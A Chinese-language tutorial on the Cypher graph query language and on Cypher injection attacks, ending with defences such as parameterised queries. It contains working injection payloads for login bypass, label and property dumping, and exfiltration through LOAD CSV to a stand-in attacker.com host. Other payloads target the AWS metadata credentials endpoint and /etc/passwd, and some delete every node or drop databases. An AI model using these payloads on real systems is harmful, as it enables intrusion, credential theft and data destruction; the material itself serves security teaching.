Cypher，全称为 (Open) Cypher Query Language，是一种专为图数据库设计的声明式查询语言。它以直观的模式匹配方式，帮助开发者和数据分析师从复杂的图结构数据中检索、创建和修改信息。如果说 SQL 是关系型数据库的语言，那么 Cypher 就是图数据库的语言。Cypher 最初由 Neo4j 开发，通过 openCypher 项目成为开放标准，现已被 RedisGraph、Apache Spark、Amazon Neptune 等多种图数据库采纳，成为图查询语言的事实标准之一。

本文将全面介绍 Cypher 的基础知识、语法结构以及 Cypher 注入的原理与攻击手法。

---

1. 图数据库与 Cypher 基础

图数据库的核心要素

与传统的关系型数据库（基于表格和行）不同，图数据库通过节点和关系的结构化方式存储数据。其核心由以下四个元素构成：

• 节点 (Nodes)：表示图中的实体，如人、书籍或公司。节点可以包含 属性 (Properties)，以键值对形式存储详细信息，例如 {name: 'Alice', age: 25}。
• 关系 (Relationships)：连接两个节点，描述它们之间的关联。关系具有方向和类型，例如 (Alice)-[:FRIENDS_WITH]->(Bob) 表示 Alice 与 Bob 之间的“朋友”关系。关系也可以拥有属性。
• 属性 (Properties)：存储在节点或关系中的键值对，用于附加详细信息。例如，一个 :Person 节点可能有 {name: 'Andy', title: 'Developer'}。
• 标签 (Labels)：用于对节点或关系进行分类。例如，所有表示人物的节点可以打上 :Person 标签，表示公司的节点可以打上 :Company 标签，便于快速查询特定类型的实体。

一个典型的应用场景是安全分析工具 BloodHound，它利用 Neo4j 和 Cypher 的能力可视化并分析 Active Directory 中的复杂权限关系，帮助安全人员发现潜在的攻击路径。

Cypher 查询语言基础语法

Cypher 的强大之处在于其声明式和可组合的特性，通过一系列 子句 (Clauses) 构建查询，每个子句像管道一样处理数据，将前一个子句的输出传递给下一个子句。以下是 Cypher 的核心语法和子句：

查询注释

• 行内注释：// 用于单行注释。
• 多行注释：/* ... */ 用于多行注释。

核心子句详解

1. MATCH：Cypher 的核心子句，用于匹配图中的模式，类似于 SQL 的 SELECT ... FROM，但更直观。

   // 匹配所有标签为 "Fruit" 的节点并返回
   MATCH (a:Fruit) RETURN a// 匹配具有特定属性的 "Fruit" 节点
   MATCH (a:Fruit {title: 'Green Apple'}) RETURN a// 使用 WHERE 子句进行复杂过滤
   MATCH (a:Fruit) WHERE a.title = "Green Apple" RETURN a// 限制结果数量并排序
   MATCH (a:Fruit) RETURN a ORDER BY a.title DESC LIMIT 20
   

   这里的 a 是一个变量，代表匹配到的节点，类似于编程中的临时变量名，开发者可以自由命名（如 a、n、m），用于在查询中引用节点。

2. CREATE：用于创建新的节点和关系。

   // 创建一个空节点
   CREATE (n)// 创建带标签和属性的节点
   CREATE (n:Person {name: 'Andy', title: 'Developer'})// 创建节点后通过 SET 添加或修改属性
   CREATE (n:Account)
   SET n.id=1, n.username="admin", n.password="password123"
   RETURN n
   

   这里的 n 是节点变量，用于表示新创建的节点。

3. UNION / UNION ALL：合并多个查询结果。UNION 会去重，UNION ALL 保留所有结果。合并的查询必须返回相同数量和名称的列。

   // 合并人员姓名和书籍标题，使用相同别名
   MATCH (n:Person) RETURN n.name AS name
   UNION
   MATCH (b:Book) RETURN b.title AS name
   

   这里的 n 和 b 是变量，分别表示 :Person 和 :Book 节点。

4. WITH：将前一个子句的输出作为中间结果传递给下一个子句，常用于复杂查询或注入攻击中的查询链。

   // 匹配所有节点，排序并限制结果
   MATCH (c)
   WITH c
   ORDER BY c.Character DESC
   LIMIT 3
   RETURN collect(c.name)
   

   这里的 c 是变量，代表匹配到的节点。

5. YIELD：在 CALL 语句中指定过程返回的字段，绑定到变量供后续使用。

   // 调用 db.labels() 获取所有标签，绑定到变量 x
   CALL db.labels() YIELD label AS x
   

6. LOAD CSV：从本地或远程 CSV 文件导入数据，支持 HTTPS、HTTP、FTP 和 file:/// 协议，常被用于 SSRF 或任意文件读取攻击。

   // 读取本地文件，可能导致任意文件读取
   LOAD CSV FROM 'file:///etc/passwd' AS line RETURN line// 读取远程文件，可能导致数据外泄
   LOAD CSV FROM 'https://attacker.com/data.csv' AS line RETURN line
   

   这里的 line 是变量，表示 CSV 文件的每一行数据。

7. APOC 库：Awesome Procedures on Cypher 是一个 Neo4j 扩展库，提供丰富的功能，如 apoc.load.json() 用于导入 JSON 数据，apoc.util.sleep() 用于时间延迟（常用于时间盲注）。由于其强大功能，APOC 库是 Cypher 注入攻击的重要目标。

---

2. Cypher 注入：原理与攻击手法

Cypher 注入是一种类似于 SQL 注入的攻击方式，攻击者通过在用户可控的输入中插入恶意 Cypher 代码，改变查询的原始意图，执行未经授权的操作，如数据泄露、权限提升或拒绝服务。

Cypher 注入的分类

根据攻击者与数据库交互的方式，Cypher 注入可分为以下几类：

1. 带内注入 (In-band)：攻击者通过同一通道注入代码并直接获取结果。
   • 基于错误 (Error-based)：通过构造恶意输入触发数据库错误，推断数据库结构或泄露数据。
2. 推断型盲注 (Inferential Blind)：攻击者无法直接看到结果，但通过应用程序的行为推断信息。
   • 基于布尔值 (Boolean-based)：通过注入 OR 1=1 或 OR 1=0，观察响应差异。
   • 基于时间 (Time-based)：通过 apoc.util.sleep() 等延迟函数，判断注入是否成功。
3. 带外注入 (Out-of-band)：利用 LOAD CSV 等功能使数据库向攻击者控制的服务器发送请求，实现数据外泄或 SSRF。

与 SQL 注入相比，Cypher 注入有以下特点：

• 无“表”概念：无法直接通过 UNION 从其他“表”获取数据，但可合并不同查询结果。
• 时间盲注需依赖 APOC：Cypher 本身无 sleep 函数，需使用 apoc.util.sleep()。

经典注入攻击示例

以下是一些典型的 Cypher 注入攻击，展示如何利用漏洞实现恶意目的。

示例 1：简单带内注入 - 绕过查询限制

原始查询（以 NodeJS 应用为例）：

executeQuery("MATCH (c:Character) WHERE c.name = '" + name + "' RETURN c")

攻击载荷：

Spongebob' or 1=1 RETURN c//

最终查询：

MATCH (c:Character) WHERE c.name = 'Spongebob' or 1=1 RETURN c//' RETURN c

分析：

• ' 闭合字符串，注入 or 1=1 使条件永真。
• // 注释掉后续内容，返回所有 :Character 节点，绕过查询限制。

示例 2：带外注入 - 数据外泄

原始查询：

MATCH (p:Person) WHERE id(p) = 42 RETURN p

攻击载荷：

42 CALL db.labels() YIELD label LOAD CSV FROM 'https://attacker.com/' + label AS r

最终查询：

MATCH (p:Person) WHERE id(p) = 42 CALL db.labels() YIELD label LOAD CSV FROM 'https://attacker.com/' + label AS r RETURN p

分析：

• CALL db.labels() 获取所有标签。
• LOAD CSV FROM 'https://attacker.com/' + label 将每个标签发送到攻击者服务器。
• 变量 r 表示 LOAD CSV 的返回数据（通常为空或 CSV 内容）。

示例 3：OPTIONAL MATCH 泄露所有节点

攻击载荷：

1 OPTIONAL MATCH (m) RETURN m AS n //

分析：

• OPTIONAL MATCH (m) 匹配图中所有节点（包括无标签节点），即使没有匹配也不会报错。
• RETURN m AS n 将所有节点重命名为 n 返回。
• 变量 m 表示匹配到的节点，n 是输出别名。
• 效果：可能泄露整个数据库的节点数据，适用于带内注入场景。

构建恶意载荷的技巧

1. 注入上下文分析：根据注入点的位置（字符串、括号等），使用 '、"、) 或 } 闭合原始查询。
2. 利用注释：通过 // 或 /* ... */ 注释掉不需要的查询部分（如 LIMIT 或 RETURN）。
3. WITH 子句：在 CREATE 等子句中注入 WITH 1337 AS y 跳出上下文，追加恶意子句。
4. URL 编码：在 HTTP 请求中，确保空格、引号等特殊字符被正确编码（如 %20、%27）。

---

3. 漏洞检测与利用实战

检测 Cypher 注入漏洞

1. 基于错误检测：
   • 输入 ' 或 "，观察是否触发语法错误。
   • 输入 1/0，触发运行时错误，分析错误信息以获取数据库结构或版本。
2. 盲注检测：
   • 数学运算：在数字参数中注入 41+2-1，若响应与 42 相同，可能存在注入。
   • 布尔值：注入 ' or 1=1// 和 ' or 1=0//，观察响应差异。
3. 带外检测：
   • 使用 LOAD CSV 向攻击者控制的服务器（如 Burp Collaborator）发送请求。
   • 示例：1 CALL db.labels() YIELD label LOAD CSV FROM 'https://attacker.com/' + label AS b RETURN b//
     • 变量 b 表示 LOAD CSV 的返回数据。

丰富的利用载荷

以下是针对不同攻击目标的 Cypher 注入载荷，涵盖认证绕过、数据泄露、SSRF、权限提升和拒绝服务。

认证绕过

• 载荷：' or 1=1//
• 场景：登录表单，绕过用户名或密码验证。
• 效果：使条件永真，返回所有匹配节点。

数据泄露（带内）

• 泄露所有标签：

  ' RETURN 1 AS x UNION CALL db.labels() YIELD label AS x RETURN x//
  

  • 变量 x 表示返回的标签名。

• 泄露指定标签的属性：

  ' RETURN 1 AS x UNION MATCH (c:Character) RETURN DISTINCT keys(c) AS x//
  

  • 变量 c 表示 :Character 节点，x 表示属性键。

• 泄露属性值：

  ' RETURN 1 AS x UNION MATCH (c:Character) RETURN c.name AS x//
  

  • 变量 x 表示节点属性 name 的值。

数据泄露（带外）

• 泄露所有标签：

  ' CALL db.labels() YIELD label LOAD CSV FROM 'https://attacker.com/'+label AS b RETURN b//
  

  • 变量 b 表示 LOAD CSV 的返回数据。

• 泄露属性值（需 APOC 库）：

  ' MATCH (c:Character) LOAD CSV FROM 'https://attacker.com/'+c.name AS b RETURN b//
  

  • 变量 b 表示 LOAD CSV 的返回数据。

SSRF 与任意文件读取

• 泄露内部服务：

  LOAD CSV FROM "http://169.254.169.254/latest/meta-data/iam/security-credentials/" AS x
  LOAD CSV FROM "https://attacker.com/"+x[0] AS y
  RETURN ''//
  

  • 变量 x 表示 AWS 元数据，y 表示外泄数据。

• 任意文件读取：

  ' RETURN n UNION LOAD CSV FROM "file:///etc/passwd" AS n RETURN n //
  

  • 变量 n 表示文件内容。

权限提升

• 原始查询：

  CREATE (n:Account) SET n.password="{注入点}"
  

• 攻击载荷：", n.admin=True RETURN n//
• 最终查询：

  CREATE (n:Account) SET n.password="", n.admin=True RETURN n //
  

  • 变量 n 表示创建的账户节点，注入后提升为管理员。

拒绝服务 (DoS)

• 删除所有节点：

  ' MATCH (all) DETACH DELETE all//
  

  • 变量 all 表示所有节点。

• 删除数据库：

  ' USE system CALL dbms.listDatabases() YIELD name WHERE name <> 'system' CALL { WITH name DROP DATABASE name } IN TRANSACTIONS RETURN 1 //
  

  • 变量 name 表示数据库名称。

---

4. 防御 Cypher 注入

1. 参数化查询：使用参数化查询（prepared statements）代替字符串拼接。例如：

   executeQuery("MATCH (c:Character) WHERE c.name = $name RETURN c", { name: userInput })
   

2. 输入验证和清理：严格验证用户输入，过滤特殊字符（如 '、", //）。
3. 最小权限原则：限制数据库用户的权限，避免执行高危操作（如 DETACH DELETE 或 DROP DATABASE）。
4. 禁用 APOC 高危功能：限制 apoc.util.sleep() 等函数，防止时间盲注。
5. 限制 LOAD CSV：禁用 file:// 协议，限制外部网络请求。
6. 错误信息隐藏：避免返回详细的数据库错误信息。

---

总结

Cypher 是一种强大且直观的图查询语言，广泛应用于图数据库中，但其灵活性也带来了 Cypher 注入 的风险。攻击者可以通过注入恶意代码实现认证绕过、数据泄露、SSRF、权限提升甚至拒绝服务。变量如 m、n、b 是查询中的临时标识符，具体含义取决于上下文，例如在 OPTIONAL MATCH (m) RETURN m AS n // 中，m 表示所有节点，n 是输出别名，可能导致整个数据库内容泄露。通过理解 Cypher 的语法和注入原理，开发者可以更好地检测和防御漏洞，而安全研究人员则能更有效地发现和利用潜在风险。